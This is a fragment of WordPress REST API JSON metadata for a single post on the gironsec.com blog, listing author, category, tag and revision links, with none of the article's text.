[…]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,6,7],"tags":[110],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1527"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=1527"}],"version-history":[{"count":9,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1527\/revisions"}],"predecessor-version":[{"id":1656,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1527\/revisions\/1656"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=1527"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=1527"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=1527"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}